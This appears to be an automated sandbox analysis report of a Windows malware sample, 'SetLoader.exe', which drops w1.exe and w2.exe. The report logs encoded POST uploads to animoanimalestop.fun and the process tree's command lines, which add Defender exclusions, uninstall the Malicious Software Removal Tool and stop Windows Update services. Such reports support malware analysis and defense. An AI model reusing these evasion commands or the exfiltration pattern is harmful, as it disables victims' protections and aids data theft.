                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjezYEEsj%2BUtqEzQDsjSk%2Bh1z0SZHtKflcnk779x8p%2BJrwwyVZwR%2BLVDvMC8ubGg8%2BcZcf6TIp4YP7Fj5RIvgYIP7DphRIX7B3B7CHqGIhO2Kym3yP4EKIUmxsV8WTwk63vpYA8jrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8b8c03a4297ec454-EWR
                                            alt-svc: h3=":443"; ma=86400


Session ID: 3
Source IP: 192.168.2.4
Source Port: 49740
Destination IP: 172.67.195.146
Destination Port: 443
PID: 5672
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:44:00 UTC | 463 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
Content-Length: 745
Host: animoanimalestop.fun
2024-08-25 13:44:00 UTC | 745 | OUT | Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 38 0c 94 26 95 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a 32 06 9e 2c 09 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 98 ca 9a 32 06 9e 2c 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0c 26 0a 0a 0a 0a 0a 0a 0a 27 0a 27 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0b 0a 0a 0a 5a 41 0f 0c 0a 0a 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 ad 52 f4 3e a7 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a a7 58 fe 34 1f 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 98 ca 98 9f ca 08 0b a9 98 ca 0a aa 9f ca 0b 0b a9 98 ca 0a aa a7 58
Data Ascii: 8&V(c,,y2,2,hZA&''ZAZAR>V(c,,yX4X
2024-08-25 13:44:00 UTC | 652 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Aug 2024 13:44:00 GMT
Connection: close
v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zs3hHb760%2Br331eHR7hmQQAO%2FwDTNfGFNcYriBo3VRyVx3HgigRduiVLMj%2Befj5wjFfMW22S9tgGLAQ5XFBTV%2BApvQcrCq%2BWLjDk2dhqNYjTGLfNkCwJQ7efyzCdkt8%2Fsy9W%2Fllbhg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b8c03ac2c1817e5-EWR
alt-svc: h3=":443"; ma=86400


Session ID: 4
Source IP: 192.168.2.4
Source Port: 49741
Destination IP: 172.67.195.146
Destination Port: 443
PID: 5672
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:44:01 UTC | 463 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
Content-Length: 212
Host: animoanimalestop.fun
2024-08-25 13:44:01 UTC | 212 | OUT | Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 32 92 45 1a 99 00 00 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a 38 98 4f 10 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 99 ca ca 98 ca 9b 0a 38 98 4f 10 68 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0c 26 0a 0a 0a 0a 0a 0a 0a 27 0a 27 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 5a 41 0c 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0b 0a 0a 0a 5a 41 0f 0c 0a 0a 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 0a 0a f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: 2EV(c,,y8O8OhZA&''ZAZA
2024-08-25 13:44:01 UTC | 650 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Aug 2024 13:44:01 GMT
Connection: close
v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1XSVKJWOX8bY%2FPcJ58%2BIz%2FOgY9WlP6e3jP%2BJaHnVsryzZUYeGgrrHweXDcR8nnxurdndjS6HQULKBsypURlpqrri4nK0ICr0gxpFs4X4pJVX3SK4In0LEV9%2FRLj4bZNV6aiF%2BxQlWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b8c03b168644265-EWR
alt-svc: h3=":443"; ma=86400


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49742
Destination IP: 172.67.195.146
Destination Port: 443
PID: 5672
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:44:02 UTC | 462 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
Content-Length: 35
Host: animoanimalestop.fun
2024-08-25 13:44:02 UTC | 35 | OUT | Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2024-08-25 13:44:02 UTC | 652 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Aug 2024 13:44:02 GMT
Connection: close
v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2BtpVy8fwjEcnJVN2ENoMHsYg7YDqKeheJnNRj8nPhNQrVWXmsoOC16%2FSZw3rw%2BMgMkLQHsqzS9B98yMt62386kIA%2BUE3Q%2BMkwsb0K%2FQ8zSIHfVO%2F4EZgTeVbyVHNMH0j58Koc9lA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b8c03b6eea2438e-EWR
alt-svc: h3=":443"; ma=86400


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49743
Destination IP: 172.67.195.146
Destination Port: 443
PID: 5672
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:44:03 UTC | 465 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
Content-Length: 96804
Host: animoanimalestop.fun
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 01 b1 ef da 18 e9 79 01 00 08 00 00 00 56 00 00 00 28 63 2c db 2c ce 79 9a bb e5 d0 12 40 05 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 91 ca ac 32 39 3f 3b 32 3a af 60 65 64 6f 79 99 00 0a c7 40 6f 9b 98 c7 0f 0a c7 0e 0a c5 0a 0a 0a 0b f5 fe 0a 0a d3 2c 43 64 7e 6f 66 22 58 23 2a 49 65 78 6f 22 5e 47 23 38 2a 49 5a 5f 2a 3c 3c 3a 3a 2a 4a 2a 38 24 3e 3a 2a 4d 42 70 9b b5 47 63 69 78 65 79 65 6c 7e 2a 48 6b 79 63 69 2a 4e 63 79 7a 66 6b 73 2a 4b 6e 6b 7a 7e 6f 78 ca c9 d6 0a ba aa ac 59 73 79 7e 6f 67 a2 58 6f 6d 63 79 7e 78 73 a2 79 67 79 79 24 6f 72 6f a3 69 79 78 79 79 24 6f 72 6f a1 7d 63 64 63 64 63 7e 24 6f 72 6f a3 69 79 78 79 79 24 6f 72 6f a6 7d 63 64 66 65 6d 65 64 24 6f 72 6f a6 79 6f 78 7c 63 69 6f 79
Data Ascii: yV(c,,y@29?;2:`edoy@o,Cd~of"X#*Iexo"^G#8*IZ_*<<::*J*8$>:*MBpGcixeyel~*Hkyci*Ncyzfks*Knkz~oxYsy~ogXomcy~xsygyy$oroiyxyy$oro}cdcdc~$oroiyxyy$oro}cdfemed$oroyox|cioy
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: 04 80 a2 4d 4b 05 f0 99 88 db df df bf c1 e0 31 8d 48 ff 21 bf 94 07 ab db ce 74 af dc a6 f4 39 06 0e 16 41 4b 09 dd 64 e9 f0 59 be 60 8f cc 25 d5 0d 59 4a f4 08 21 aa 7e 9a b5 ca 80 1d 25 fb 0e 76 dc 73 76 24 40 5d 1e 08 bb c9 bf 56 d3 5c 7d 8f f2 ff f3 6e 53 a9 6f 0d 10 db 80 e7 4b 6b c0 b2 c2 0c 05 b6 e2 cf f3 62 26 00 47 39 15 c2 c2 63 48 37 79 0c f7 41 88 cc d9 4b ae 03 d3 b3 2c 05 ab eb 6e 0a 0b fb 29 70 bf 57 aa 18 df c0 4f 73 1b 14 38 40 4b 5b d9 7b 5a 30 4f 50 67 be d1 98 90 91 58 f1 ac 38 0b 95 29 40 75 1d ab b7 e9 9b 7f 24 64 91 aa 5a fb 98 c4 85 c2 96 76 6e 8f 3f 49 7b f0 d0 97 8d a8 38 e8 37 43 fb 7e e2 9f 2f 5f 53 e8 26 8f b0 a5 24 0f 36 16 89 ba 2e 8c e1 80 88 71 4b b0 7c ed d3 cb e1 21 60 2c 90 77 28 d3 4d c2 23 08 5f ea bf 22 01 82 1c 05
Data Ascii: MK1H!t9AKdY`%YJ!~%vsv$@]V\}nSoKkb&G9cH7yAK,n)pWOs8@K[{Z0OPgX8)@u$dZvn?I{87C~/_S&$6.qK|!`,w(M#_"
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: 7d c6 f7 60 ff 74 25 1c e5 cf e6 eb 23 50 2a 82 67 ab 21 ce 55 f3 7e 7e 1f a1 f1 63 70 bf 6a 23 bd 22 e3 ee b0 b4 6c 25 af 8d 47 f7 82 7c 20 13 f2 0e 69 b5 75 30 d8 e8 2a 89 b5 e5 f6 51 b8 6c e8 89 d9 de d4 64 b2 8e b5 ed a6 27 bb 84 d4 6a 4c 8b e1 69 6f ee 86 8c fd a7 d0 cd e0 84 48 c5 79 55 38 f6 78 91 19 94 d3 73 c8 6c ca b4 fd cc 2d 45 b6 af dd 31 22 bd c0 de da 62 f0 8b f8 bf b0 10 92 34 0a b4 aa 76 a2 7e a0 6f 45 e3 2d 5d 2e be 68 f6 5f 46 6b 35 5f 4a 00 1d 39 3c 9e 78 ef f0 83 9c c9 a1 ec 63 61 79 67 35 8d 9b f0 59 b0 58 e5 d5 66 11 cf e3 80 65 0c b0 12 8d 37 d5 0f d6 e3 21 1e 18 70 ad 35 6e 38 e6 5d 89 b7 21 43 11 ad 54 f6 80 d7 e2 7c a2 ef b4 9b 1d 59 bc bb 29 eb d1 82 4e f3 23 b4 ea 8d e7 e5 fa fd 9e 20 d1 43 35 6d 84 51 39 16 e0 65 28 80 6a 96
Data Ascii: }`t%#P*g!U~~cpj#"l%G| iu0*Qld'jLioHyU8xsl-E1"b4v~oE-].h_Fk5_J9<xcayg5YXfe7!p5n8]!CT|Y)N# C5mQ9e(j
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: e4 93 a0 51 b3 b4 e8 ec 14 02 d8 72 5a 3e 1d b3 68 36 e6 76 c1 7b 72 55 38 40 5a f9 4b fb d6 97 95 35 09 6b ec cf e9 48 fa cb 66 9c 54 c5 40 b3 3e 11 3a a0 5f 11 be ad a9 fe c4 7f 51 1a fb 4a 86 b1 4c f2 93 c2 61 b9 b7 17 20 66 cb b9 c7 1c 05 6d b3 65 55 8b 61 27 d6 e5 97 ca 6f a0 f7 61 17 c5 97 70 ee d5 9d 54 41 89 2a 7e 2d 8e 24 b6 06 9b 43 92 ab c7 b6 ee 11 bd fe d1 49 50 3a 7c e8 1d df 1c f0 5b de 3d 5d 9b f4 fc 31 45 75 78 42 ae 70 2e f1 c7 b2 9c 34 3f a2 00 8f ed 56 99 9a 32 b5 26 b1 37 cc de a7 26 f4 3b bb c4 36 dc 96 3a e2 48 75 d5 b2 f2 2b dc 16 b1 3f 7c 82 c6 10 75 1d dc c3 28 f1 46 f8 b8 3d 7e db 69 62 51 e2 83 4d 8c be fa e0 10 c5 9a 7b fc 17 15 38 fa 2e fc c4 af c2 7d 23 23 b7 45 31 1f e1 27 0e bd d3 1a f9 1f b4 e2 56 c1 9f 97 3f 75 e2 b7 ad
Data Ascii: QrZ>h6v{rU8@ZK5kHfT@>:_QJLa fmeUa'oapTA*~-$CIP:|[=]1EuxBp.4?V2&7&;6:Hu+?|u(F=~ibQM{8.}##E1'V?u
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: 85 ad c2 ca 67 85 85 48 95 3b 88 15 ed c2 4a 1d c1 09 5e 5a 5a 1a 26 2a 3e ca f1 46 15 f0 b8 17 04 71 d4 bd b8 9c 06 f6 f9 e0 fe f9 43 4b 85 96 c4 a5 4c 2d 7c c5 9f 0d ab 37 fa a8 16 63 0c 90 7b 2f 8b 42 af 53 e1 18 ce b8 b1 e8 df 3c 25 5c 99 fb 63 c2 ea 0f b7 99 b1 2e a0 20 cd ed 10 b3 7a 3b d9 91 fb 7a 64 a1 1a 91 49 63 bc 6d b4 96 ce 85 06 c8 b3 6b 95 ac 9d d7 5e 46 09 e2 dd 08 e8 54 9d b6 66 f5 8f a4 4e 77 c7 77 65 c0 38 b8 9d 9e 50 d7 f8 45 7f 92 9d 73 bd 29 4f 01 71 99 8e 64 6c a4 e5 c2 5a 76 64 82 59 46 22 81 e9 0d c6 70 e0 51 6e 69 ee 82 4c cc f8 19 c2 bf 71 e3 67 54 c5 1a 4d 14 21 cc 38 83 47 33 ec 81 3d 40 31 f6 13 31 f1 34 e2 75 4c 73 25 0f 91 5d 06 cb b1 46 6e 2a 9c e1 af 58 6b f7 b3 3e 1a b2 91 de 92 4b 97 d3 3c 1c 86 f1 d2 7a f8 19 86 c9 08
Data Ascii: gH;J^ZZ&*>FqCKL-|7c{/BS<%\c. z;zdIcmk^FTfNwwe8PEs)OqdlZvdYF"pQniLqgTM!8G3=@114uLs%]Fn*Xk>K<z
2024-08-25 13:44:03 UTC | 15331 | OUT | Data Raw: 22 6a 6d 08 9d d3 5a 30 1f 6f 76 3d a5 1c ef ff e2 5e 0e b2 ec 59 a0 a9 1a 82 94 ec 55 41 42 57 5b 53 ae 90 f7 95 ea fc 16 21 37 82 9f e0 2f e4 86 5c 08 4b 89 93 49 bb ea 26 31 9f eb b9 66 06 f2 c6 61 2e 3c f3 c6 4d 98 80 0d 8e 48 f7 4b 38 4b 2d 0d 79 a8 0d 92 9b 3a 14 8a 21 11 80 d8 4f 97 8f 52 25 fb d7 58 09 7c a6 7e 4e 1e db 39 c1 c0 39 81 b2 8a 7f b8 69 fc c8 19 fa 5a 70 20 3e b7 1a 5d 9c 1f ad 25 12 1d 1e ac e4 b7 79 0c 75 0e a5 a1 33 5f da 83 63 4b 21 32 e8 c5 3b 18 e9 90 82 43 58 39 87 26 53 72 a4 95 42 bf c9 f3 7a b0 34 db e6 4c ec bc b1 8d d7 b6 f8 6e 8a df 90 3b 15 1d 45 6e 0f 5e de 1a b8 6e 6a 3d 45 04 cf 96 b8 d0 c7 8d da 59 54 58 60 c7 9c 94 84 d6 ab bf b4 b8 d7 cc 7d 32 17 b5 03 5d ad 26 68 35 c7 29 09 d8 d3 47 ed 7f 4f cb 17 29 11 d3 df 0d
Data Ascii: "jmZ0ov=^YUABW[S!7/\KI&1fa.<MHK8K-y:!OR%X|~N99iZp >]%yu3_cK!2;CX9&SrBz4Ln;En^nj=EYTX`}2]&h5)GO)
2024-08-25 13:44:03 UTC | 4818 | OUT | Data Raw: 2e 96 fb 62 a0 79 03 56 66 79 59 65 c2 d3 49 e0 eb 3a 55 93 9c fe fa 8e 4e 01 29 81 ef 5d c9 b1 b6 79 78 e6 95 14 73 e4 22 6e d5 7a fe b2 7e a0 fb 73 d9 54 28 4c 5f 96 ec fd c1 58 df 23 bd 65 08 db d8 f8 68 e1 60 10 a5 46 65 48 07 e3 84 44 7d 2e 7e 75 86 93 27 71 93 8e be f7 a6 40 ea a1 74 2b f1 cc 73 28 e3 6b 5c 42 4e d3 87 33 e1 8e d3 a7 e5 67 2c a6 ab 2f c4 33 57 9d b9 84 d8 12 3f d6 65 9d 37 68 a0 95 da ac 57 19 72 f3 47 63 5c f8 91 d8 47 3f 23 b3 34 60 41 d2 b9 07 0d dc cb 37 ee e2 d1 f6 a8 3f df 98 37 d4 4e b1 55 fd 04 95 d6 29 09 28 90 17 3f bc 73 39 4b 3b 89 0c e3 e5 0c 21 ef bf 43 ed 8d dc 8e 74 07 d2 62 b2 5e 8b d5 92 43 be 73 f0 d6 41 b5 f6 19 da 60 6e a2 b0 5a b8 b1 4e b8 59 26 53 53 99 0b ed 6a 95 bf 49 5a 40 8f 42 a6 82 de a9 c5 de e9 b4 70
Data Ascii: .byVfyYeI:UN)]yxs"nz~sT(L_X#eh`FeHD}.~u'q@t+s(k\BN3g,/3W?e7hWrGc\G?#4`A7?7NU)(?s9K;!Ctb^CsA`nZNY&SSjIZ@Bp
2024-08-25 13:44:04 UTC | 648 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Aug 2024 13:44:04 GMT
Connection: close
v: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAmomQB0FIgQdA29rEAlsRe%2FRIMznxrm4%2FU6Jd3s0xWSNQv0KTjPBHxxm8PKPHTKu%2B5Ukqtf0tTJ6S%2BNEi6YuS5cn32WV1lCHWXlZGa4VNcifDCogHBs%2BJJHyBUqhCocnyzUzArNNg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b8c03c08a4443d9-EWR
alt-svc: h3=":443"; ma=86400


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49744
Destination IP: 172.67.195.146
Destination Port: 443
PID: 5672
Process: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe

Timestamp | Bytes transferred | Direction | Data
2024-08-25 13:44:05 UTC | 462 | OUT | POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
view: EWPaUxMfED3Kvdn/MeKeVYktBM77Kz05gePpm4x74GbD5OiEppfnVhszq85Nf6xByyHDrrtRkwCQR8pm6NJ15v4zVsfDuU62lzhKyvVI9jNOrcsdrSI
Content-Length: 35
Host: animoanimalestop.fun
2024-08-25 13:44:05 UTC | 35 | OUT | Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii:
2024-08-25 13:44:05 UTC | 526 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Aug 2024 13:44:05 GMT
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rJOPjqXOdTLqYmels9iY%2BMxwkM92KI7h8tH1RK7QUaJ80fQlEBF9rpV0tuHpfNWST75t0i8vGrTMbuw7BtuAimOSfn%2BzBDNBFB3v1IqIszghS58Dypk4ljq04%2FpVlnO%2B8YMRgM4fA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b8c03c84e5c18b1-EWR
alt-svc: h3=":443"; ma=86400


Target ID: 0
Start time: 09:43:03
Start date: 25/08/2024
Path: C:\Users\user\Desktop\SetLoader.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SetLoader.exe"
Imagebase: 0x610000
File size: 15'458'400 bytes
MD5 hash: 68ADCB0C0E4419351AE5371732EA78DD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 4
Start time: 09:43:37
Start date: 25/08/2024
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe"
Imagebase: 0x400000
File size: 834'649'568 bytes
MD5 hash: 739213A2496D01E16DDC02B6898A81AD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

Target ID: 5
Start time: 09:44:15
Start date: 25/08/2024
Path: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe"
Imagebase: 0x140000000
File size: 831'071'200 bytes
MD5 hash: FCE277E4928FDE19CD8BAD5CE1997792
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 6
Start time: 09:44:17
Start date: 25/08/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff6ac780000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 09:44:17
Start date: 25/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff70ecf0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop UsoSvc
Imagebase: 0x7ff7c59c0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 11
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff6c87f0000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 09:44:21
Start date: 25/08/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase: 0x7ff7c59c0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 09:44:22
Start date: 25/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:16
                                            Start time:09:44:22
                                            Start date:25/08/2024
                                            Path:C:\Windows\System32\sc.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                            Imagebase:0x7ff7c59c0000
                                            File size:72'192 bytes
                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

